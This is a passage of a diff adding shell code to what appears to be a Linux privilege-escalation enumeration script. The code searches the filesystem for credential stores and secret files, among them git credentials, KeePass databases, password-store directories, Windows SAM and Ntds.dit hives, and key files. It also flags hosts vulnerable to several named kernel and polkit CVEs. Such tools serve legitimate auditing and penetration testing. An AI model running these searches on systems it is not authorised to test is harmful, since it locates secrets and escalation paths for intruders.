"$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_PRIVATE\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "zabbix_server\.conf$|zabbix_agentd\.conf$|zabbix$" | sort | uniq | head -n 70)
+ PSTORAGE_GITHUB=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "\.github$|\.gitconfig$|\.git-credentials$|\.git$" | sort | uniq | head -n 70)
+ PSTORAGE_SVN=$(echo -e "$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_PRIVATE\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "\.svn$" | sort | uniq | head -n 70)
+ PSTORAGE_KEEPASS=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E ".*\.kdbx$|KeePass\.config.*$|KeePass\.ini$|KeePass\.enforced.*$" | sort | uniq | head -n 70)
+ PSTORAGE_PRE_SHARED_KEYS=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E ".*\.psk$" | sort | uniq | head -n 70)
+ PSTORAGE_PASS_STORE_DIRECTORIES=$(echo -e "$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_PRIVATE\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "\.password-store$" | sort | uniq | head -n 70)
+ PSTORAGE_FTP=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E ".*\.ftpconfig$|ffftp\.ini$|ftp\.ini$|ftp\.config$|sites\.ini$|wcx_ftp\.ini$|winscp\.ini$|ws_ftp\.ini$" | sort | uniq | head -n 70)
+ PSTORAGE_BIND=$(echo -e "$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_PRIVATE\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/var|^/etc|^/usr" | grep -E "bind$" | sort | uniq | head -n 70)
+ PSTORAGE_SEEDDMS=$(echo -e "$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_PRIVATE\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "seeddms.*$" | sort | uniq | head -n 70)
+ PSTORAGE_DDCLIENT=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "ddclient\.conf$" | sort | uniq | head -n 70)
+ PSTORAGE_KCPASSWORD=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "kcpassword$" | sort | uniq | head -n 70)
+ PSTORAGE_SENTRY=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_PRIVATE\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "sentry$|sentry\.conf\.py$" | sort | uniq | head -n 70)
+ PSTORAGE_STRAPI=$(echo -e "$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_PRIVATE\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "environments$" | sort | uniq | head -n 70)
+ PSTORAGE_CACTI=$(echo -e "$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_PRIVATE\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "cacti$" | sort | uniq | head -n 70)
+ PSTORAGE_ROUNDCUBE=$(echo -e "$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_PRIVATE\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "roundcube$" | sort | uniq | head -n 70)
+ PSTORAGE_PASSBOLT=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "passbolt\.php$" | sort | uniq | head -n 70)
+ PSTORAGE_JETTY=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "jetty-realm\.properties$" | sort | uniq | head -n 70)
+ PSTORAGE_WGET=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "\.wgetrc$" | sort | uniq | head -n 70)
+ PSTORAGE_INTERESTING_LOGS=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "access\.log$|error\.log$" | sort | uniq | head -n 70)
+ PSTORAGE_OTHER_INTERESTING=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "\.bashrc$|\.google_authenticator$|hosts\.equiv$|\.lesshst$|\.plan$|\.profile$|\.recently-used\.xbel$|\.rhosts$|\.sudo_as_admin_successful$" | sort | uniq | head -n 70)
+ PSTORAGE_WINDOWS=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "unattend\.inf$|.*\.rdg$|AppEvent\.Evt$|ConsoleHost_history\.txt$|FreeSSHDservice\.ini$|NetSetup\.log$|Ntds\.dit$|protecteduserkey\.bin$|RDCMan\.settings$|SAM$|SYSTEM$|SecEvent\.Evt$|appcmd\.exe$|bash\.exe$|datasources\.xml$|default\.sav$|drives\.xml$|groups\.xml$|https-xampp\.conf$|https\.conf$|iis6\.log$|index\.dat$|my\.cnf$|my\.ini$|ntuser\.dat$|pagefile\.sys$|printers\.xml$|recentservers\.xml$|scclient\.exe$|scheduledtasks\.xml$|security\.sav$|server\.xml$|setupinfo$|setupinfo\.bak$|sitemanager\.xml$|sites\.ini$|software$|software\.sav$|sysprep\.inf$|sysprep\.xml$|system\.sav$|unattend\.txt$|unattend\.xml$|unattended\.xml$|wcx_ftp\.ini$|ws_ftp\.ini$|web.*\.config$|winscp\.ini$|wsl\.exe$" | sort | uniq | head -n 70)
+ PSTORAGE_DATABASE=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -v -E '/man/|/usr/|/var/cache/' | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E ".*\.db$|.*\.sqlite$|.*\.sqlite3$" | sort | uniq | head -n 70)
+ PSTORAGE_BACKUPS=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "backup$|backups$" | sort | uniq | head -n 70)
+ PSTORAGE_PASSWORD_FILES=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E ".*password.*$|.*credential.*$|creds.*$|.*\.key$" | sort | uniq | head -n 70)
+
+
+ ##### POST SERACH VARIABLES #####
+ backup_folders_row="$(echo $PSTORAGE_BACKUPS | tr '\n' ' ')"
+ printf ${YELLOW}"DONE\n"$NC
+ echo ""
+fi
+
+
+
+
+
+
+
+
+
+
+
+
+
+if echo $CHECKS | grep -q system_information; then
+print_title "System Information"
+###########################################
+#-------------) System Info (-------------#
+###########################################
+
+#-- SY) OS
+print_2title "Operative system"
+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits"
+(cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED},"
+warn_exec lsb_release -a 2>/dev/null
+if [ "$MACPEAS" ]; then
+ warn_exec system_profiler SPSoftwareDataType
+fi
+echo ""
+
+#-- SY) Sudo
+print_2title "Sudo version"
+if [ "$(command -v sudo 2>/dev/null)" ]; then
+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version"
+sudo -V 2>/dev/null | grep "Sudo ver" | sed -${E} "s,$sudovB,${SED_RED},"
+else echo_not_found "sudo"
+fi
+echo ""
+
+#-- SY) CVEs
+print_2title "CVEs Check"
+
+#-- SY) CVE-2021-4034
+if [ `command -v pkexec` ] && stat -c '%a' $(which pkexec) | grep -q 4755 && [ "$(stat -c '%Y' $(which pkexec))" -lt "1642035600" ]; then
+ echo "Vulnerable to CVE-2021-4034" | sed -${E} "s,.*,${SED_RED_YELLOW},"
+ echo ""
+fi
+
+#-- SY) CVE-2021-3560
+polkitVersion=$(systemctl status polkit.service 2>/dev/null | grep version | cut -d " " -f 9)
+if [ "$(apt list --installed 2>/dev/null | grep polkit | grep -c 0.105-26)" -ge 1 ] || [ "$(yum list installed 2>/dev/null | grep polkit | grep -c 0.117-2)" ]; then
+ echo "Vulnerable to CVE-2021-3560" | sed -${E} "s,.*,${SED_RED_YELLOW},"
+ echo ""
+fi
+
+#-- SY) CVE-2022-0847
+#-- https://dirtypipe.cm4all.com/
+#-- https://stackoverflow.com/a/37939589
+kernelversion=$(uname -r | awk -F"-" '{print $1}')
+kernelnumber=$(echo $kernelversion | awk -F. '{ printf("%d%03d%03d%03d\n", $1,$2,$3,$4); }')
+if [ $kernelnumber -ge 5008000000 ] && [ $kernelnumber -lt 5017000000 ]; then # if kernel version beteen 5.8 and 5.17
+ echo "Vulnerable to CVE-2022-0847" | sed -${E} "s,.*,${SED_RED_YELLOW},"
+ echo ""
+fi
+echo ""
+
+#--SY) USBCreator
+if (busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator) || [ "$DEBUG" ]; then
+ print_2title "USBCreator"
+ print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation"
+
+ pc_version=$(dpkg -l 2>/dev/null | grep policykit-desktop-privileges | grep -oP "[0-9][0-9a-zA-Z\.]+")
+ if [ -z "$pc_version" ]; then
+ pc_version=$(apt-cache policy policykit-desktop-privileges 2>/dev/null | grep -oP "\*\*\*.*" | cut -d" " -f2)
+ fi
+ if [ -n "$pc_version" ]; then
+ pc_length=${#pc_version}
+ pc_major=$(echo "$pc_version" | cut -d. -f1)
+ pc_minor=$(echo "$pc_version" | cut -d. -f2)
+ if [ "$pc_length" -eq 4 ] && [ "$pc_major" -eq 0 ] && [ "$pc_minor" -lt 21 ]; then
+ echo "Vulnerable!!" | sed -${E} "s,.*,${SED_RED},"
+ fi
+ fi
+fi
+echo ""
+
+#-- SY) PATH
+
+print_2title "PATH"
+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses"
+if ! [ "$IAMROOT" ]; then
+ echo "$OLDPATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g"
+ echo "New path exported: $PATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\. ,${SED_RED_YELLOW},g"
+else
+ echo "New path exported: $PATH" 2>/dev/null
+fi
+echo ""
+
+#-- SY) Date
